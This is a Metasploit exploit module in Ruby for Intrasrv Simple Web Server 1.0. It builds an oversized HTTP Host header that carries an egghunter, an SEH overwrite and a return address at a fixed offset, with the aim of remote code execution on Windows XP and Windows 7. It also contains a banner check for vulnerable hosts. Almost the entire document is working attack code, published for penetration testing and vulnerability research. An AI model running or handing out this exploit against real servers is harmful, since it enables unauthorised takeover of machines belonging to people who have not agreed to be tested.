Intrasrv 1.0 Buffer Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Egghunter

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Intrasrv 1.0 Buffer Overflow",
			'Description'    => %q{
				This module exploits a boundary condition error in Intrasrv Simple Web
				Server 1.0. The web interface does not validate the boundaries of an
				HTTP request string prior to copying the data to an insufficiently large
				buffer. Successful exploitation leads to arbitrary remote code execution
				in the context of the application.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'xis_one', # Discovery, PoC
					'PsychoSpy <neinwechter[at]gmail.com>' # Metasploit
				],
			'References'     =>
				[
					['OSVDB', '94097'],
					['EDB','18397'],
					['BID','60229']
				],
			'Payload'        =>
				{
					'Space' => 4660,
					'StackAdjustment' => -3500,
					'BadChars' => "\x00"
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "thread"
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['v1.0 - XP / Win7',
						{
							'Offset' => 1553,
							'Ret'    => 0x004097dd #p/p/r - intrasrv.exe
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "May 30 2013",
			'DefaultTarget'  => 0))

			register_options(
				[
					OptPort.new('RPORT', [true, 'The remote port', 80])
				], self.class)
	end

	def check
		begin
			connect
		rescue
			print_error("Could not connect to target!")
			return Exploit::CheckCode::Safe
		end
		sock.put("GET / HTTP/1.0\r\n\r\n")
		res = sock.get_once

		if res =~ /intrasrv 1.0/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Safe
		end
	end

	def exploit
		# setup egghunter
		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
			:checksum=>true
		})

		# setup buffer
		buf = rand_text(target['Offset']-126)         # junk to egghunter at jmp -128
		buf << hunter                                 # egghunter
		buf << rand_text(target['Offset']-buf.length) # more junk to offset
		buf << "\xeb\x80" + rand_text(2)              # nseh - jmp -128 to egghunter
		buf << [target.ret].pack("V*")                # seh

		# second last byte of payload/egg gets corrupted - pad 2 bytes
		# so we don't corrupt the actual payload
		egg << rand_text(2)

		print_status("Sending buffer...")
		# Payload location is an issue, so we're using the tcp mixin
		# instead of HttpClient here to maximize control over what's sent.
		# (i.e. no additional headers to mess with the stack)
		connect
		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n\r\n#{egg}\r\n\r\n")
		disconnect
	end
end